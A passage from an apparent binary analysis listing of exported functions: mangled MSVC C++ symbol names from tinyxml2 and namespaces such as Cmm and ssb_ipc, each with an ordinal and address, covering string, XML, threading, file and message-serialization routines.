              ?ShallowEqual@XMLComment@tinyxml2@@UBE_NPBVXMLNode@2@@Z58670x460ca0
              ?ShallowEqual@XMLDeclaration@tinyxml2@@UBE_NPBVXMLNode@2@@Z58680x460da0
              ?ShallowEqual@XMLDocument@tinyxml2@@UBE_NPBVXMLNode@2@@Z58690x454b70
              ?ShallowEqual@XMLElement@tinyxml2@@UBE_NPBVXMLNode@2@@Z58700x462060
              ?ShallowEqual@XMLText@tinyxml2@@UBE_NPBVXMLNode@2@@Z58710x460ba0
              ?ShallowEqual@XMLUnknown@tinyxml2@@UBE_NPBVXMLNode@2@@Z58720x460ea0
              ?Signal@CEvent@Cmm@@QAEXXZ58730x40c270
              ?Signal@CState@Cmm@@QAEXXZ58740x417190
              ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPADQADPAH@Z58750x454260
              ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPBDPBDPAH@Z58760x454220
              ?Sleep@CThread@Cmm@@SAXI@Z58770x417360
              ?Sleep@PlatformThread@@SAXH@Z58780x417360
              ?SpanExcluding@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@PBD@Z58790x4053c0
              ?SpanExcluding@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@PB_W@Z58800x403490
              ?SpanIncluding@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@PBD@Z58810x405400
              ?SpanIncluding@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@PB_W@Z58820x4034d0
              ?SplitString@?$CStringT@D@Cmm@@QBE?AV?$vector@V?$CStringT@D@Cmm@@V?$allocator@V?$CStringT@D@Cmm@@@std@@@std@@ABV12@H@Z58830x405700
              ?SplitString@?$CStringT@_W@Cmm@@QBE?AV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@ABV12@H@Z58840x403860
              ?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ58850x428130
              ?StartsWith@?$CStringT@D@Cmm@@QBE_NABV12@_N@Z58860x4059b0
              ?StartsWith@?$CStringT@_W@Cmm@@QBE_NABV12@_N@Z58870x403b50
              ?StepUp@CClock@Cmm@@QAEJXZ58880x412050
              ?Stop@CIPCChannelThread@ssb_ipc@@QAEHXZ58890x428160
              ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z58900x454310
              ?StringToBool@Cmm@@YAHABV?$CStringT@D@1@AAH@Z58910x414590
              ?StringToBool@Cmm@@YAHABV?$CStringT@_W@1@AAH@Z58920x4145d0
              ?StringToHex@Cmm@@YAXABV?$CStringT@D@1@AAV21@@Z58930x4146a0
              ?StringToInt64@Cmm@@YAHABV?$CStringT@D@1@AA_J@Z58940x4140e0
              ?StringToInt64@Cmm@@YAHABV?$CStringT@_W@1@AA_J@Z58950x414120
              ?StringToInt@Cmm@@YAHABV?$CStringT@D@1@AAH@Z58960x414310
              ?StringToInt@Cmm@@YAHABV?$CStringT@_W@1@AAH@Z58970x414360
              ?StringToUInt64@Cmm@@YAHABV?$CStringT@D@1@AA_K@Z58980x414210
              ?StringToUInt64@Cmm@@YAHABV?$CStringT@_W@1@AA_K@Z58990x414290
              ?StringToUInt@Cmm@@YAHABV?$CStringT@D@1@AAI@Z59000x4144f0
              ?StringToUInt@Cmm@@YAHABV?$CStringT@_W@1@AAI@Z59010x414540
              ?StripTrailingSeparators@FilePath@Cmm@@QBE?AV12@XZ59020x45b720
              ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ59030x45b760
              ?Suspend@CThread@Cmm@@QAEXXZ59040x4172c0
              ?Swap@?$CStringT@D@Cmm@@QAEXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z59050x403fc0
              ?Swap@?$CStringT@_W@Cmm@@QAEXAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z59060x403fc0
              ?Swap@CFile@Cmm@@QAEXAAV12@@Z59070x4114b0
              ?Swap@ListValue@@QAEXPAV1@@Z59080x45dc80
              ?Tell@CFile@Cmm@@QBE_KXZ59090x411810
              ?ThreadProc@CIPCChannelThread@ssb_ipc@@UAEIXZ59100x428210
              ?TimerStrictCheck@CTimerID@Cmm@@AAEHXZ59110x410ef0
              ?ToBool@XMLUtil@tinyxml2@@SA_NPBDPA_N@Z59120x4600e0
              ?ToComment@XMLComment@tinyxml2@@UAEPAV12@XZ59130x411350
              ?ToComment@XMLComment@tinyxml2@@UBEPBV12@XZ59140x411350
              ?ToComment@XMLNode@tinyxml2@@UAEPAVXMLComment@2@XZ59150x402d00
              ?ToComment@XMLNode@tinyxml2@@UBEPBVXMLComment@2@XZ59160x402d00
              ?ToDeclaration@XMLConstHandle@tinyxml2@@QBEPBVXMLDeclaration@2@XZ59170x454da0
              ?ToDeclaration@XMLDeclaration@tinyxml2@@UAEPAV12@XZ59180x411350
              ?ToDeclaration@XMLDeclaration@tinyxml2@@UBEPBV12@XZ59190x411350
              ?ToDeclaration@XMLHandle@tinyxml2@@QAEPAVXMLDeclaration@2@XZ59200x454d20
              ?ToDeclaration@XMLNode@tinyxml2@@UAEPAVXMLDeclaration@2@XZ59210x402d00
              ?ToDeclaration@XMLNode@tinyxml2@@UBEPBVXMLDeclaration@2@XZ59220x402d00
              ?ToDocument@XMLDocument@tinyxml2@@UAEPAV12@XZ59230x411350
              ?ToDocument@XMLDocument@tinyxml2@@UBEPBV12@XZ59240x411350
              ?ToDocument@XMLNode@tinyxml2@@UAEPAVXMLDocument@2@XZ59250x402d00
              ?ToDocument@XMLNode@tinyxml2@@UBEPBVXMLDocument@2@XZ59260x402d00
              ?ToDouble@?$CStringT@D@Cmm@@QBENN@Z59270x405190
              ?ToDouble@?$CStringT@_W@Cmm@@QBENN@Z59280x403250
              ?ToDouble@XMLUtil@tinyxml2@@SA_NPBDPAN@Z59290x4601a0
              ?ToDoubleT@Time@Cmm@@QBENXZ59300x451460
              ?ToElement@XMLConstHandle@tinyxml2@@QBEPBVXMLElement@2@XZ59310x454d40
              ?ToElement@XMLElement@tinyxml2@@UAEPAV12@XZ59320x411350
              ?ToElement@XMLElement@tinyxml2@@UBEPBV12@XZ59330x411350
              ?ToElement@XMLHandle@tinyxml2@@QAEPAVXMLElement@2@XZ59340x454cc0
              ?ToElement@XMLNode@tinyxml2@@UAEPAVXMLElement@2@XZ59350x402d00
              ?ToElement@XMLNode@tinyxml2@@UBEPBVXMLElement@2@XZ59360x402d00
              ?ToElementWithName@XMLNode@tinyxml2@@ABEPBVXMLElement@2@PBD@Z59370x460a80
              ?ToFileTime@Time@Cmm@@QBE?AU_FILETIME@@XZ59380x451920
              ?ToFloat@XMLUtil@tinyxml2@@SA_NPBDPAM@Z59390x460180
              ?ToInt64@XMLUtil@tinyxml2@@SA_NPBDPA_J@Z59400x4601c0
              ?ToInt@XMLUtil@tinyxml2@@SA_NPBDPAH@Z59410x4600a0
              ?ToInternalValue@Time@Cmm@@QBE_JXZ59420x411a70
              ?ToInternalValue@TimeDelta@Cmm@@QBE_JXZ59430x411a70
              ?ToInternalValue@TimeTicks@Cmm@@QBE_JXZ59440x411a70
              ?ToLong@?$CStringT@D@Cmm@@QBEJJH@Z59450x4051c0
              ?ToLong@?$CStringT@_W@Cmm@@QBEJJH@Z59460x403280
              ?ToNode@XMLConstHandle@tinyxml2@@QBEPBVXMLNode@2@XZ59470x40c630
              ?ToNode@XMLHandle@tinyxml2@@QAEPAVXMLNode@2@XZ59480x40c630
              ?ToStr@XMLUtil@tinyxml2@@SAXHPADH@Z59490x45ff90
              ?ToStr@XMLUtil@tinyxml2@@SAXIPADH@Z59500x45ffb0
              ?ToStr@XMLUtil@tinyxml2@@SAXMPADH@Z59510x460000
              ?ToStr@XMLUtil@tinyxml2@@SAXNPADH@Z59520x460030
              ?ToStr@XMLUtil@tinyxml2@@SAX_JPADH@Z59530x460060
              ?ToStr@XMLUtil@tinyxml2@@SAX_KPADH@Z59540x460080
              ?ToStr@XMLUtil@tinyxml2@@SAX_NPADH@Z59550x45ffd0
              ?ToString@CCmmArchivePath@Cmm@@QBEXABV?$CStringT@_W@2@AAV32@@Z59560x459cf0
              ?ToText@XMLConstHandle@tinyxml2@@QBEPBVXMLText@2@XZ59570x454d60
              ?ToText@XMLHandle@tinyxml2@@QAEPAVXMLText@2@XZ59580x454ce0
              ?ToText@XMLNode@tinyxml2@@UAEPAVXMLText@2@XZ59590x402d00
              ?ToText@XMLNode@tinyxml2@@UBEPBVXMLText@2@XZ59600x402d00
              ?ToText@XMLText@tinyxml2@@UAEPAV12@XZ59610x411350
              ?ToText@XMLText@tinyxml2@@UBEPBV12@XZ59620x411350
              ?ToTimeT@Time@Cmm@@QBE_JXZ59630x451360
              ?ToTimeTInMS@Time@Cmm@@QBE_JXZ59640x4513e0
              ?ToULong@?$CStringT@D@Cmm@@QBEJJH@Z59650x4051c0
              ?ToULong@?$CStringT@_W@Cmm@@QBEJJH@Z59660x403280
              ?ToUnknown@XMLConstHandle@tinyxml2@@QBEPBVXMLUnknown@2@XZ59670x454d80
              ?ToUnknown@XMLHandle@tinyxml2@@QAEPAVXMLUnknown@2@XZ59680x454d00
              ?ToUnknown@XMLNode@tinyxml2@@UAEPAVXMLUnknown@2@XZ59690x402d00
              ?ToUnknown@XMLNode@tinyxml2@@UBEPBVXMLUnknown@2@XZ59700x402d00
              ?ToUnknown@XMLUnknown@tinyxml2@@UAEPAV12@XZ59710x411350
              ?ToUnknown@XMLUnknown@tinyxml2@@UBEPBV12@XZ59720x411350
              ?ToUnsigned64@XMLUtil@tinyxml2@@SA_NPBDPA_K@Z59730x460200
              ?ToUnsigned@XMLUtil@tinyxml2@@SA_NPBDPAI@Z59740x4600c0
              ?ToWStringHack@FilePath@Cmm@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ59750x45b6f0
              ?ToXmlElement@CCmmArchiveTreeNode@Archive@Cmm@@QAEPAVXMLElement@tinyxml2@@PAVXMLDocument@5@@Z59760x4592c0
              ?TransferTo@StrPair@tinyxml2@@QAEXPAV12@@Z59770x45fa10
              ?Trim@?$CStringT@D@Cmm@@QAEXPBD@Z59780x405230
              ?Trim@?$CStringT@D@Cmm@@QAEXXZ59790x405260
              ?Trim@?$CStringT@_W@Cmm@@QAEXPB_W@Z59800x4032f0
              ?Trim@?$CStringT@_W@Cmm@@QAEXXZ59810x403330
              ?TrimLeft@?$CStringT@D@Cmm@@QAEXPBD@Z59820x4052f0
              ?TrimLeft@?$CStringT@D@Cmm@@QAEXXZ59830x405320
              ?TrimLeft@?$CStringT@_W@Cmm@@QAEXPB_W@Z59840x4033c0
              ?TrimLeft@?$CStringT@_W@Cmm@@QAEXXZ59850x4033f0
              ?TrimRight@?$CStringT@D@Cmm@@QAEXPBD@Z59860x405270
              ?TrimRight@?$CStringT@D@Cmm@@QAEXXZ59870x4052a0
              ?TrimRight@?$CStringT@_W@Cmm@@QAEXPB_W@Z59880x403340
              ?TrimRight@?$CStringT@_W@Cmm@@QAEXXZ59890x403370
              ?TruncateExisting@CFile@Cmm@@QAEXPB_WW4EAccess@12@@Z59900x411670
              ?TryLock@CCritical@Cmm@@QAE?AW4ESyncRet@@XZ59910x417090
              ?TryLock@CMutex@Cmm@@QAE?AW4ESyncRet@@XZ59920x4170f0
              ?UInt64ToString@Cmm@@YAX_KAAV?$CStringT@D@1@@Z59930x414160
              ?UInt64ToString@Cmm@@YAX_KAAV?$CStringT@_W@1@@Z59940x4141a0
              ?UIntToString@Cmm@@YAXIAAV?$CStringT@D@1@@Z59950x414450
              ?UIntToString@Cmm@@YAXIAAV?$CStringT@_W@1@@Z59960x4144a0
              ?UTCExplode@Time@Cmm@@QBEXPAUExploded@12@@Z59970x412280
              ?UnixEpoch@Time@Cmm@@SA?AV12@XZ59980x4514a0
              ?Unlink@XMLNode@tinyxml2@@AAEXPAV12@@Z59990x460570
              ?Unlock@CCritical@Cmm@@QAEXXZ60000x40c790
              ?Unlock@CEvent@Cmm@@QAEXXZ60010x402f90
              ?Unlock@CMutex@Cmm@@QAEXXZ60020x417130
              ?Unlock@CState@Cmm@@QAEXXZ60030x402f90
              ?Unsignal@CState@Cmm@@QAEXXZ60040x4171c0
              ?Unsigned64Attribute@XMLElement@tinyxml2@@QBE_KPBD_K@Z60050x461550
              ?Unsigned64Text@XMLElement@tinyxml2@@QBE_K_K@Z60060x461ba0
              ?Unsigned64Value@XMLAttribute@tinyxml2@@QBE_KXZ60070x4545c0
              ?UnsignedAttribute@XMLElement@tinyxml2@@QBEIPBDI@Z60080x4614e0
              ?UnsignedText@XMLElement@tinyxml2@@QBEII@Z60090x461b50
              ?UnsignedValue@XMLAttribute@tinyxml2@@QBEIXZ60100x4545e0
              ?Value@XMLAttribute@tinyxml2@@QBEPBDXZ60110x460f20
              ?Value@XMLNode@tinyxml2@@QBEPBDXZ60120x4604a0
              ?Visit@XMLPrinter@tinyxml2@@UAE_NABVXMLComment@2@@Z60130x4637b0
              ?Visit@XMLPrinter@tinyxml2@@UAE_NABVXMLDeclaration@2@@Z60140x4637d0
              ?Visit@XMLPrinter@tinyxml2@@UAE_NABVXMLText@2@@Z60150x463780
              ?Visit@XMLPrinter@tinyxml2@@UAE_NABVXMLUnknown@2@@Z60160x4637f0
              ?Visit@XMLVisitor@tinyxml2@@UAE_NABVXMLComment@2@@Z60170x454150
              ?Visit@XMLVisitor@tinyxml2@@UAE_NABVXMLDeclaration@2@@Z60180x454150
              ?Visit@XMLVisitor@tinyxml2@@UAE_NABVXMLText@2@@Z60190x454150
              ?Visit@XMLVisitor@tinyxml2@@UAE_NABVXMLUnknown@2@@Z60200x454150
              ?VisitEnter@XMLPrinter@tinyxml2@@UAE_NABVXMLDocument@2@@Z60210x463680
              ?VisitEnter@XMLPrinter@tinyxml2@@UAE_NABVXMLElement@2@PBVXMLAttribute@2@@Z60220x4636b0
              ?VisitEnter@XMLVisitor@tinyxml2@@UAE_NABVXMLDocument@2@@Z60230x454150
              ?VisitEnter@XMLVisitor@tinyxml2@@UAE_NABVXMLElement@2@PBVXMLAttribute@2@@Z60240x454160
              ?VisitExit@XMLPrinter@tinyxml2@@UAE_NABVXMLDocument@2@@Z60250x454150
              ?VisitExit@XMLPrinter@tinyxml2@@UAE_NABVXMLElement@2@@Z60260x463740
              ?VisitExit@XMLVisitor@tinyxml2@@UAE_NABVXMLDocument@2@@Z60270x454150
              ?VisitExit@XMLVisitor@tinyxml2@@UAE_NABVXMLElement@2@@Z60280x454150
              ?WaitForIOCompletion@Channel@ssb_ipc@@QAEXH@Z60290x45cbb0
              ?WakeUp@Channel@ssb_ipc@@QAE_NXZ60300x45cbc0
              ?WhitespaceMode@XMLDocument@tinyxml2@@QBE?AW4Whitespace@2@XZ60310x454b10
              ?WideCharToMultiByteBestFit@@YAHHPB_WHPADHPBDPAH@Z60320x413840
              ?Write@CFile@Cmm@@QAEIPBXI@Z60330x4116d0
              ?Write@XMLPrinter@tinyxml2@@IAEXPBD@Z60340x454e70
              ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z60350x462c20
              ?WriteData@?$CmmMessageTemplate_10@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60360x42dc70
              ?WriteData@?$CmmMessageTemplate_10@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60370x42c400
              ?WriteData@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IHIHV12@H_KHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60380x42e810
              ?WriteData@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60390x428bc0
              ?WriteData@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60400x4292b0
              ?WriteData@?$CmmMessageTemplate_11@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60410x42db60
              ?WriteData@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60420x42e730
              ?WriteData@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60430x428ae0
              ?WriteData@?$CmmMessageTemplate_12@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60440x42da40
              ?WriteData@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_K@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60450x42e650
              ?WriteData@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60460x428a00
              ?WriteData@?$CmmMessageTemplate_13@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60470x42d920
              ?WriteData@?$CmmMessageTemplate_13@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60480x42e570
              ?WriteData@?$CmmMessageTemplate_14@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60490x42d800
              ?WriteData@?$CmmMessageTemplate_14@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHI@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60500x42e490
              ?WriteData@?$CmmMessageTemplate_15@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60510x42d6e0
              ?WriteData@?$CmmMessageTemplate_15@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHII@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60520x42e3b0
              ?WriteData@?$CmmMessageTemplate_1@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60530x436720
              ?WriteData@?$CmmMessageTemplate_1@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60540x40d5c0
              ?WriteData@?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60550x40d3b0
              ?WriteData@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60560x40d920
              ?WriteData@?$CmmMessageTemplate_1@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60570x439940
              ?WriteData@?$CmmMessageTemplate_2@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60580x43a4d0
              ?WriteData@?$CmmMessageTemplate_2@HI@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60590x43f290
              ?WriteData@?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60600x43af70
              ?WriteData@?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60610x437720
              ?WriteData@?$CmmMessageTemplate_2@H_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60620x436660
              ?WriteData@?$CmmMessageTemplate_2@IH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60630x438a40
              ?WriteData@?$CmmMessageTemplate_2@II@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60640x435190
              ?WriteData@?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60650x435bc0
              ?WriteData@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60660x40d6b0
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60670x43ce40
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60680x434f70
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60690x438ed0
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60700x4441e0
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60710x43da60
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60720x43b3d0
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60730x435f60
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60740x435650
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V?$CStringT@D@2@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60750x443790
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60760x436320
              ?WriteData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60770x40d9e0
              ?WriteData@?$CmmMessageTemplate_2@_JH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60780x442260
              ?WriteData@?$CmmMessageTemplate_2@_JV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60790x43f6c0
              ?WriteData@?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60800x439870
              ?WriteData@?$CmmMessageTemplate_3@HHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60810x43a7f0
              ?WriteData@?$CmmMessageTemplate_3@HHV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60820x43ac60
              ?WriteData@?$CmmMessageTemplate_3@HIH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60830x4401f0
              ?WriteData@?$CmmMessageTemplate_3@HII@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60840x440710
              ?WriteData@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60850x43e350
              ?WriteData@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60860x43aea0
              ?WriteData@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60870x43ca20
              ?WriteData@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60880x442ee0
              ?WriteData@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60890x445720
              ?WriteData@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60900x437650
              ?WriteData@?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60910x4365a0
              ?WriteData@?$CmmMessageTemplate_3@IHI@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60920x4404d0
              ?WriteData@?$CmmMessageTemplate_3@IHV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60930x438990
              ?WriteData@?$CmmMessageTemplate_3@IIH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60940x43d2f0
              ?WriteData@?$CmmMessageTemplate_3@III@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60950x436f50
              ?WriteData@?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60960x43bfc0
              ?WriteData@?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60970x435ad0
              ?WriteData@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60980x446060
              ?WriteData@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z60990x439230
              ?WriteData@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61000x437fd0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61010x43cd90
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61020x43d0c0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61030x440e60
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61040x43ea80
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61050x43bc80
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61060x43c530
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61070x43fef0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61080x438dc0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61090x4440f0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@_JV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61100x43d9a0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61110x442b80
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HI@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61120x441c20
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61130x4446c0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV?$CStringT@D@2@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61140x444aa0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61150x438310
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@II@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61160x43b1a0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61170x436ab0
              ?WriteData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z61180x435eb0
